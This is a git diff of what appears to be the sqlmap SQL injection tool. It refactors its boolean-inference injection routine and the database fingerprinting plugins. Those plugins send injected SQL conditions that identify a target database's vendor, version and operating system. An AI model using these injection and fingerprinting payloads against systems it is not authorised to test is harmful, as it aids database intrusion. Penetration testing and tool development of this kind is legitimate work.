diff --git a/lib/request/inject.py b/lib/request/inject.py index a77ce3991..f523ffaa5 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -97,15 +97,15 @@ def __goInferenceFields(expression, expressionFields, expressionFieldsList, payl return outputs def __goBooleanProxy(expression, resumeValue=True): - vector = kb.injection.data[kb.technique].vector - kb.pageTemplate = getPageTemplate(kb.injection.data[kb.technique].templatePayload, kb.injection.place) - vector = vector.replace("[INFERENCE]", "%s" % expression) - vector = agent.cleanupPayload(vector) - query = agent.prefixQuery(vector) - query = agent.suffixQuery(query) + vector = kb.injection.data[kb.technique].vector + vector = vector.replace("[INFERENCE]", expression) + vector = agent.cleanupPayload(vector) + query = agent.prefixQuery(vector) + query = agent.suffixQuery(query) payload = agent.payload(newValue=query) + if resumeValue: output = resume(expression, payload) else: @@ -116,7 +116,6 @@ def __goBooleanProxy(expression, resumeValue=True): return output - def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, resumeValue=True, unpack=True, charsetType=None, firstChar=None, lastChar=None): """ Retrieve the output of a SQL query characted by character taking @@ -124,21 +123,16 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r parameter through a bisection algorithm. """ - if kb.technique and kb.injection.data[kb.technique].vector is not None: - vector = agent.cleanupPayload(kb.injection.data[kb.technique].vector) - kb.pageTemplate = getPageTemplate(kb.injection.data[kb.technique].templatePayload, kb.injection.place) - else: - vector = queries[kb.misc.testedDbms].inference.query - kb.pageTemplate = kb.originalPage - - query = agent.prefixQuery(vector) - query = agent.suffixQuery(query) - payload = agent.payload(newValue=query) - count = None - startLimit = 0 - stopLimit = None - outputs = [] - test = None + kb.pageTemplate = getPageTemplate(kb.injection.data[kb.technique].templatePayload, kb.injection.place) + vector = agent.cleanupPayload(kb.injection.data[kb.technique].vector) + query = agent.prefixQuery(vector) + query = agent.suffixQuery(query) + payload = agent.payload(newValue=query) + count = None + startLimit = 0 + stopLimit = None + outputs = [] + test = None untilLimitChar = None untilOrderChar = None @@ -161,7 +155,7 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r expressionFieldsList = [expressionFields] if len(expressionFieldsList) > 1: - infoMsg = "the SQL query provided has more than a field. " + infoMsg = "the SQL query provided has more than a field. " infoMsg += "sqlmap will now unpack it into distinct queries " infoMsg += "to be able to retrieve the output even if we " infoMsg += "are going blind" @@ -398,7 +392,7 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse (if selected). """ - if suppressOutput or expected == EXPECTED.BOOL: + if suppressOutput: pushValue(conf.verbose) conf.verbose = 0 @@ -414,6 +408,7 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse if expected == EXPECTED.BOOL: forgeCaseExpression = booleanExpression = expression + if expression.upper().startswith("SELECT "): booleanExpression = expression[len("SELECT "):] else: @@ -421,35 +416,35 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse if inband and kb.unionTest is not None: kb.technique = PAYLOAD.TECHNIQUE.UNION + if expected == EXPECTED.BOOL: value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump) else: value = __goInband(query, expected, sort, resumeValue, unpack, dump) - found = value or (value is None and expectingNone) - if not found: - warnMsg = "for some reason(s) it was not possible to retrieve " - warnMsg += "the query output through inband SQL injection " - warnMsg += "technique, sqlmap is going blind" - logger.warn(warnMsg) + found = value or (value is None and expectingNone) oldParamNegative = kb.unionNegative kb.unionNegative = False if error and kb.errorTest and not found: kb.technique = PAYLOAD.TECHNIQUE.ERROR + if expected == EXPECTED.BOOL: value = __goError(forgeCaseExpression, resumeValue) else: value = __goError(query, resumeValue) + found = value or (value is None and expectingNone) if blind and kb.booleanTest and not found: kb.technique = PAYLOAD.TECHNIQUE.BOOLEAN + if expected == EXPECTED.BOOL: value = __goBooleanProxy(booleanExpression, resumeValue) else: value = __goInferenceProxy(query, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar) + found = value or (value is None and expectingNone) if time and (kb.timeTest or kb.stackedTest) and not found: @@ -472,12 +467,13 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse errMsg += "leveraged to retrieve queries output" raise sqlmapNotVulnerableException, errMsg finally: - if suppressOutput or expected == EXPECTED.BOOL: + if suppressOutput: conf.verbose = popValue() if value and expected == EXPECTED.BOOL: if isinstance(value, basestring): value = value.lower() + if value in ("true", "false"): value = bool(value) else: @@ -506,5 +502,5 @@ def goStacked(expression, silent=False): return payload, page -def checkBooleanExpression(expression, expectingNone=False): - return getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, expectingNone=expectingNone) +def checkBooleanExpression(expression): + return getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNone=True) diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py index 50a748c92..6346714f4 100644 --- a/plugins/dbms/access/fingerprint.py +++ b/plugins/dbms/access/fingerprint.py @@ -42,7 +42,7 @@ class Fingerprint(GenericFingerprint): elif kb.dbmsVersion[0] in ("2002-2003", "2007"): table = "MSysAccessStorage" if table: - result = inject.checkBooleanExpression("EXISTS(SELECT CURDIR() FROM %s)" % table, expectingNone=True) + result = inject.checkBooleanExpression("EXISTS(SELECT CURDIR() FROM %s)" % table) retVal = "not sandboxed" if result else "sandboxed" return retVal @@ -69,7 +69,7 @@ class Fingerprint(GenericFingerprint): negate = True table = table[1:] randInt = randomInt() - result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt), expectingNone=True) + result = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt)) if result is None: result = False if negate: @@ -90,7 +90,7 @@ class Fingerprint(GenericFingerprint): randInt = randomInt() randStr = randomStr() - _ = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt), expectingNone=True) + _ = inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt)) if wasLastRequestDBMSError(): match = re.search("Could not find file\s+'([^']+?)'", kb.lastErrorPage[1]) @@ -154,13 +154,13 @@ class Fingerprint(GenericFingerprint): logMsg = "testing Microsoft Access" logger.info(logMsg) - result = inject.checkBooleanExpression("VAL(CVAR(1))=1", expectingNone=True) + result = inject.checkBooleanExpression("VAL(CVAR(1))=1") if result: logMsg = "confirming Microsoft Access" logger.info(logMsg) - result = inject.checkBooleanExpression("IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0", expectingNone=True) + result = inject.checkBooleanExpression("IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0") if not result: warnMsg = "the back-end DBMS is not Microsoft Access" diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py index 667dc0d5f..9eaf4c5ea 100644 --- a/plugins/dbms/firebird/fingerprint.py +++ b/plugins/dbms/firebird/fingerprint.py @@ -84,7 +84,7 @@ class Fingerprint(GenericFingerprint): version, checks = table[i] failed = False check = checks[randomRange(0,len(checks)-1)].replace("%d", getUnicode(randomRange(1,100))) - result = inject.checkBooleanExpression(check, expectingNone=True) + result = inject.checkBooleanExpression(check) if result: retVal = version else: @@ -98,7 +98,7 @@ class Fingerprint(GenericFingerprint): def __dialectCheck(self): retVal = None if kb.dbms: - result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)", expectingNone=True) + result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)") retVal = "dialect 3" if result else "dialect 1" return retVal @@ -115,13 +115,13 @@ class Fingerprint(GenericFingerprint): logger.info(logMsg) randInt = randomInt() - result = inject.checkBooleanExpression("EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt), expectingNone=True) + result = inject.checkBooleanExpression("EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt)) if result: logMsg = "confirming Firebird" logger.info(logMsg) - result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)", expectingNone=True) + result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)") if not result: warnMsg = "the back-end DBMS is not Firebird" diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py index f9a5286f7..6a62b9856 100644 --- a/plugins/dbms/maxdb/fingerprint.py +++ b/plugins/dbms/maxdb/fingerprint.py @@ -50,13 +50,13 @@ class Fingerprint(GenericFingerprint): minor, major = None, None for version in [6, 7]: - result = inject.checkBooleanExpression("(SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version) + result = inject.checkBooleanExpression("%d=(SELECT MAJORVERSION FROM SYSINFO.VERSION)" % version) if result: major = version for version in xrange(0, 10): - result = inject.checkBooleanExpression("(SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version) + result = inject.checkBooleanExpression("%d=(SELECT MINORVERSION FROM SYSINFO.VERSION)" % version) if result: minor = version @@ -113,13 +113,13 @@ class Fingerprint(GenericFingerprint): logger.info(logMsg) randInt = randomInt() - result = inject.checkBooleanExpression("NOROUND(%d)=%d" % (randInt, randInt), expectingNone=True) + result = inject.checkBooleanExpression("%d=NOROUND(%d)" % (randInt, randInt)) if result: logMsg = "confirming SAP MaxDB" logger.info(logMsg) - result = inject.checkBooleanExpression("MAPCHAR(NULL,1,DEFAULTMAP) IS NULL", expectingNone=True) + result = inject.checkBooleanExpression("MAPCHAR(NULL,1,DEFAULTMAP) IS NULL") if not result: warnMsg = "the back-end DBMS is not SAP MaxDB" diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py index f8da87cb7..572b41f62 100644 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ b/plugins/dbms/mssqlserver/fingerprint.py @@ -92,7 +92,7 @@ class Fingerprint(GenericFingerprint): result = True else: randInt = randomInt() - result = inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt), expectingNone=True) + result = inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt)) if result: infoMsg = "confirming Microsoft SQL Server" @@ -176,21 +176,19 @@ class Fingerprint(GenericFingerprint): # Get back-end DBMS underlying operating system version for version, data in versions.items(): - query = "(SELECT LEN(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) + query = "(SELECT LEN(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) query += "LIKE '%Windows NT " + data[0] + "%')>0" - query = agent.forgeCaseStatement(query) - if inject.getValue(query, charsetType=1, suppressOutput=True) == "1": + if inject.checkBooleanExpression(query): + infoMsg += " %s" % kb.osVersion kb.osVersion = version - infoMsg += " %s" % kb.osVersion - break if not kb.osVersion: kb.osVersion = "2003" - kb.osSP = 2 + kb.osSP = 2 - warnMsg = "unable to fingerprint the underlying operating " + warnMsg = "unable to fingerprint the underlying operating " warnMsg += "system version, assuming it is Windows " warnMsg += "%s Service Pack %d" % (kb.osVersion, kb.osSP) logger.warn(warnMsg) @@ -203,11 +201,10 @@ class Fingerprint(GenericFingerprint): sps = versions[kb.osVersion][1] for sp in sps: - query = "(SELECT LEN(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) + query = "(SELECT LEN(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) query += "LIKE '%Service Pack " + getUnicode(sp) + "%')>0" - query = agent.forgeCaseStatement(query) - if inject.getValue(query, charsetType=1, suppressOutput=True) == "1": + if inject.checkBooleanExpression(query): kb.osSP = sp break diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 2563dd7f9..092efd4c7 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -163,13 +163,13 @@ class Fingerprint(GenericFingerprint): logger.info(infoMsg) randInt = getUnicode(randomInt(1)) - result = inject.checkBooleanExpression("CONNECTION_ID()=CONNECTION_ID()", expectingNone=True) + result = inject.checkBooleanExpression("CONNECTION_ID()=CONNECTION_ID()") if result: infoMsg = "confirming MySQL" logger.info(infoMsg) - result = inject.checkBooleanExpression("ISNULL(1/0)" if kb.injection.place != PLACE.URI else "ISNULL(1 DIV 0)", expectingNone=True) + result = inject.checkBooleanExpression("ISNULL(1 DIV 0)") if not result: warnMsg = "the back-end DBMS is not MySQL" @@ -178,7 +178,7 @@ class Fingerprint(GenericFingerprint): return False # Determine if it is MySQL >= 5.0.0 - if inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.TABLES LIMIT 0, 1)" % (randInt, randInt), expectingNone=True): + if inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.TABLES LIMIT 0, 1)" % (randInt, randInt)): kb.data.has_information_schema = True kb.dbmsVersion = [">= 5.0.0"] @@ -190,28 +190,28 @@ class Fingerprint(GenericFingerprint): return True # Check if it is MySQL >= 5.5.0 - if inject.checkBooleanExpression("TO_SECONDS(950501)>0", expectingNone=True): + if inject.checkBooleanExpression("TO_SECONDS(950501)>0"): kb.dbmsVersion = [">= 5.5.0"] # Check if it is MySQL >= 5.1.2 and < 5.5.0 - elif inject.checkBooleanExpression("@@table_open_cache=@@table_open_cache", expectingNone=True): - if inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)" % (randInt, randInt), expectingNone=True): + elif inject.checkBooleanExpression("@@table_open_cache=@@table_open_cache"): + if inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)" % (randInt, randInt)): kb.dbmsVersion = [">= 5.1.12", "< 5.5.0"] - elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PROCESSLIST LIMIT 0, 1)" % (randInt,randInt), expectingNone=True): + elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PROCESSLIST LIMIT 0, 1)" % (randInt,randInt)): kb.dbmsVersion = [">= 5.1.7", "< 5.1.12"] - elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PARTITIONS LIMIT 0, 1)" % (randInt, randInt), expectingNone=True): + elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PARTITIONS LIMIT 0, 1)" % (randInt, randInt)): kb.dbmsVersion = ["= 5.1.6"] - elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PLUGINS LIMIT 0, 1)" % (randInt, randInt), expectingNone=True): + elif inject.checkBooleanExpression("%s=(SELECT %s FROM information_schema.PLUGINS LIMIT 0, 1)" % (randInt, randInt)): kb.dbmsVersion = [">= 5.1.5", "< 5.1.6"] else: kb.dbmsVersion = [">= 5.1.2", "< 5.1.5"] # Check if it is MySQL >= 5.0.0 and < 5.1.2 - elif inject.checkBooleanExpression("@@hostname=@@hostname", expectingNone=True): + elif inject.checkBooleanExpression("@@hostname=@@hostname"): kb.dbmsVersion = [">= 5.0.38", "< 5.1.2"] - elif inject.checkBooleanExpression("%s=(SELECT %s FROM DUAL)" % (randInt, randInt), expectingNone=True): + elif inject.checkBooleanExpression("%s=(SELECT %s FROM DUAL)" % (randInt, randInt)): kb.dbmsVersion = [">= 5.0.11", "< 5.0.38"] - elif inject.checkBooleanExpression("DATABASE() LIKE SCHEMA()", expectingNone=True): + elif inject.checkBooleanExpression("DATABASE() LIKE SCHEMA()"): kb.dbmsVersion = [">= 5.0.2", "< 5.0.11"] else: kb.dbmsVersion = [">= 5.0.0", "<= 5.0.1"] @@ -228,22 +228,22 @@ class Fingerprint(GenericFingerprint): return True # Check which version of MySQL < 5.0.0 it is - if inject.checkBooleanExpression("3=(SELECT COERCIBILITY(USER()))", expectingNone=True): + if inject.checkBooleanExpression("3=(SELECT COERCIBILITY(USER()))"): kb.dbmsVersion = [">= 4.1.11", "< 5.0.0"] - elif inject.checkBooleanExpression("2=(SELECT COERCIBILITY(USER()))", expectingNone=True): + elif inject.checkBooleanExpression("2=(SELECT COERCIBILITY(USER()))"): kb.dbmsVersion = [">= 4.1.1", "< 4.1.11"] - elif inject.checkBooleanExpression("CURRENT_USER()=CURRENT_USER()", expectingNone=True): + elif inject.checkBooleanExpression("CURRENT_USER()=CURRENT_USER()"): kb.dbmsVersion = [">= 4.0.6", "< 4.1.1"] - if inject.checkBooleanExpression("(SELECT CHARSET(CURRENT_USER()))='utf8'", expectingNone=True): + if inject.checkBooleanExpression("'utf8'=(SELECT CHARSET(CURRENT_USER()))"): kb.dbmsVersion = ["= 4.1.0"] else: kb.dbmsVersion = [">= 4.0.6", "< 4.1.0"] - elif inject.checkBooleanExpression("0=(SELECT FOUND_ROWS()", expectingNone=True): + elif inject.checkBooleanExpression("0=(SELECT FOUND_ROWS())"): kb.dbmsVersion = [">= 4.0.0", "< 4.0.6"] - elif inject.checkBooleanExpression("CONNECTION_ID()=CONNECTION_ID()", expectingNone=True): + elif inject.checkBooleanExpression("CONNECTION_ID()=CONNECTION_ID()"): kb.dbmsVersion = [">= 3.23.14", "< 4.0.0"] - elif inject.checkBooleanExpression("USER()=USER()", expectingNone=True): + elif inject.checkBooleanExpression("USER()=USER()"): kb.dbmsVersion = [">= 3.22.11", "< 3.23.14"] else: kb.dbmsVersion = ["< 3.22.11"] @@ -262,7 +262,7 @@ class Fingerprint(GenericFingerprint): infoMsg = "fingerprinting the back-end DBMS operating system" logger.info(infoMsg) - if inject.checkBooleanExpression("(SELECT MID(@@datadir, 1, 1))='/'"): + if inject.checkBooleanExpression("'/'=(SELECT MID(@@datadir, 1, 1))"): kb.os = "Linux" else: kb.os = "Windows" diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py index 408b85632..55f556fc1 100644 --- a/plugins/dbms/oracle/fingerprint.py +++ b/plugins/dbms/oracle/fingerprint.py @@ -80,7 +80,7 @@ class Fingerprint(GenericFingerprint): if conf.direct: result = True else: - result = inject.checkBooleanExpression("ROWNUM=ROWNUM", expectingNone=True) + result = inject.checkBooleanExpression("ROWNUM=ROWNUM") if result: logMsg = "confirming Oracle" @@ -91,7 +91,7 @@ class Fingerprint(GenericFingerprint): if conf.direct: result = True else: - result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)", expectingNone=True) + result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)") if not result: warnMsg = "the back-end DBMS is not Oracle" @@ -106,17 +106,13 @@ class Fingerprint(GenericFingerprint): if not conf.extensiveFp: return True - query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1" - version = inject.getValue(query, unpack=False, suppressOutput=True) + for version in ("11i", "10g", "9i", "8i"): + number = re.search("([\d]+)", version).group(1) + output = inject.checkBooleanExpression("%s=(SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % number) - if re.search("^11", version): - kb.dbmsVersion = ["11i"] - elif re.search("^10", version): - kb.dbmsVersion = ["10g"] - elif re.search("^9", version): - kb.dbmsVersion = ["9i"] - elif re.search("^8", version): - kb.dbmsVersion = ["8i"] + if output: + kb.dbmsVersion = [ version ] + break return True else: diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index 053cc2eb9..d24a88854 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py @@ -85,14 +85,13 @@ class Fingerprint(GenericFingerprint): logger.info(infoMsg) randInt = getUnicode(randomInt(1)) - - result = inject.checkBooleanExpression("%s::int=%s" % (randInt, randInt), expectingNone=True) + result = inject.checkBooleanExpression("%s::int=%s" % (randInt, randInt)) if result: infoMsg = "confirming PostgreSQL" logger.info(infoMsg) - result = inject.checkBooleanExpression("COALESCE(%s, NULL)=%s" % (randInt, randInt), expectingNone=True) + result = inject.checkBooleanExpression("COALESCE(%s, NULL)=%s" % (randInt, randInt)) if not result: warnMsg = "the back-end DBMS is not PostgreSQL" @@ -107,33 +106,33 @@ class Fingerprint(GenericFingerprint): if not conf.extensiveFp: return True - if inject.getValue("SELECT DIV(6, 3)", unpack=False, charsetType=2, suppressOutput=True) == "2": + if inject.checkBooleanExpression("2=(SELECT DIV(6, 3))"): kb.dbmsVersion = [">= 8.4.0"] elif inject.getValue("SELECT SUBSTR(TRANSACTION_TIMESTAMP()::text, 1, 1)", unpack=False, charsetType=2, suppressOutput=True) in ( "1", "2" ) and not inject.getValue("SELECT SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)", unpack=False, charsetType=2, suppressOutput=True) in ( "1", "2" ): kb.dbmsVersion = [">= 8.3.0", "< 8.4"] elif inject.getValue("SELECT SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)", unpack=False, charsetType=2, suppressOutput=True): kb.dbmsVersion = [">= 8.2.0", "< 8.3.0"] - elif inject.getValue("SELECT GREATEST(5, 9, 1)", unpack=False, charsetType=2, suppressOutput=True) == "9": + elif inject.checkBooleanExpression("9=(SELECT GREATEST(5, 9, 1))"): kb.dbmsVersion = [">= 8.1.0", "< 8.2.0"] - elif inject.getValue("SELECT WIDTH_BUCKET(5.35, 0.024, 10.06, 5)", unpack=False, charsetType=2, suppressOutput=True) == "3": + elif inject.checkBooleanExpression("3=(SELECT WIDTH_BUCKET(5.35, 0.024, 10.06, 5))"): kb.dbmsVersion = [">= 8.0.0", "< 8.1.0"] - elif inject.getValue("SELECT SUBSTR(MD5('sqlmap'), 1, 1)", unpack=False, suppressOutput=True): + elif inject.checkBooleanExpression("'d'=(SELECT SUBSTR(MD5('sqlmap'), 1, 1))"): kb.dbmsVersion = [">= 7.4.0", "< 8.0.0"] - elif inject.getValue("SELECT SUBSTR(CURRENT_SCHEMA(), 1, 1)", unpack=False, suppressOutput=True) == "p": + elif inject.checkBooleanExpression("'p'=(SELECT SUBSTR(CURRENT_SCHEMA(), 1, 1))"): kb.dbmsVersion = [">= 7.3.0", "< 7.4.0"] - elif inject.getValue("SELECT BIT_LENGTH(1)") == "8": + elif inject.checkBooleanExpression("8=(SELECT BIT_LENGTH(1))"): kb.dbmsVersion = [">= 7.2.0", "< 7.3.0"] - elif inject.getValue("SELECT SUBSTR(QUOTE_LITERAL('a'), 2, 1)", unpack=False, suppressOutput=True) == "a": + elif inject.checkBooleanExpression("'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'), 2, 1))"): kb.dbmsVersion = [">= 7.1.0", "< 7.2.0"] - elif inject.getValue("SELECT POW(2, 3)", unpack=False, charsetType=2, suppressOutput=True) == "8": + elif inject.checkBooleanExpression("8=(SELECT POW(2, 3))"): kb.dbmsVersion = [">= 7.0.0", "< 7.1.0"] - elif inject.getValue("SELECT MAX('a')") == "a": + elif inject.checkBooleanExpression("'a'=(SELECT MAX('a'))"): kb.dbmsVersion = [">= 6.5.0", "< 6.5.3"] elif re.search("([\d\.]+)", inject.getValue("SELECT SUBSTR(VERSION(), 12, 5)", unpack=False, suppressOutput=True)): kb.dbmsVersion = [">= 6.4.0", "< 6.5.0"] - elif inject.getValue("SELECT SUBSTR(CURRENT_DATE, 1, 1)", unpack=False, charsetType=2, suppressOutput=True) == "2": + elif inject.checkBooleanExpression("2=(SELECT SUBSTR(CURRENT_DATE, 1, 1))"): kb.dbmsVersion = [">= 6.3.0", "< 6.4.0"] - elif inject.getValue("SELECT SUBSTRING('sqlmap', 1, 1)", unpack=False, suppressOutput=True) == "s": + elif inject.checkBooleanExpression("'s'=(SELECT SUBSTRING('sqlmap', 1, 1))"): kb.dbmsVersion = [">= 6.2.0", "< 6.3.0"] else: kb.dbmsVersion = ["< 6.2.0"] @@ -160,11 +159,10 @@ class Fingerprint(GenericFingerprint): osWindows = ( " Visual C++", "mingw" ) for osPattern in osWindows: - query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) + query = "(SELECT LENGTH(%s) FROM %s WHERE %s " % (self.tblField, self.fileTblName, self.tblField) query += "LIKE '%" + osPattern + "%')>0" - query = agent.forgeCaseStatement(query) - if inject.getValue(query, charsetType=1, suppressOutput=True) == "1": + if inject.checkBooleanExpression(query): kb.os = "Windows" break diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py index c017f12ef..e6fc27b04 100644 --- a/plugins/dbms/sqlite/fingerprint.py +++ b/plugins/dbms/sqlite/fingerprint.py @@ -81,13 +81,13 @@ class Fingerprint(GenericFingerprint): logMsg = "testing SQLite" logger.info(logMsg) - result = inject.checkBooleanExpression("LAST_INSERT_ROWID()=LAST_INSERT_ROWID()", expectingNone=True) + result = inject.checkBooleanExpression("LAST_INSERT_ROWID()=LAST_INSERT_ROWID()") if result: logMsg = "confirming SQLite" logger.info(logMsg) - result = inject.checkBooleanExpression("SQLITE_VERSION()=SQLITE_VERSION()", expectingNone=True) + result = inject.checkBooleanExpression("SQLITE_VERSION()=SQLITE_VERSION()") if not result: warnMsg = "the back-end DBMS is not SQLite" @@ -95,7 +95,7 @@ class Fingerprint(GenericFingerprint): return False else: - result = inject.checkBooleanExpression("RANDOMBLOB(-1)>0", expectingNone=True) + result = inject.checkBooleanExpression("RANDOMBLOB(-1)>0") kb.dbmsVersion = [ '3' if result else '2' ] setDbms(DBMS.SQLITE) diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py index ca5bc2771..8b87e799a 100644 --- a/plugins/dbms/sybase/fingerprint.py +++ b/plugins/dbms/sybase/fingerprint.py @@ -81,13 +81,13 @@ class Fingerprint(GenericFingerprint): if conf.direct: result = True else: - result = inject.checkBooleanExpression("tempdb_id()=tempdb_id()", expectingNone=True) + result = inject.checkBooleanExpression("tempdb_id()=tempdb_id()") if result: logMsg = "confirming Sybase" logger.info(logMsg) - result = inject.checkBooleanExpression("suser_id()=suser_id()", expectingNone=True) + result = inject.checkBooleanExpression("suser_id()=suser_id()") if not result: warnMsg = "the back-end DBMS is not Sybase" @@ -103,7 +103,7 @@ class Fingerprint(GenericFingerprint): return True for version in range(12, 16): - result = inject.checkBooleanExpression("@@VERSION_NUMBER/1000=%d" % version, expectingNone=True) + result = inject.checkBooleanExpression("@@VERSION_NUMBER/1000=%d" % version) if result: kb.dbmsVersion = ["%d" % version] break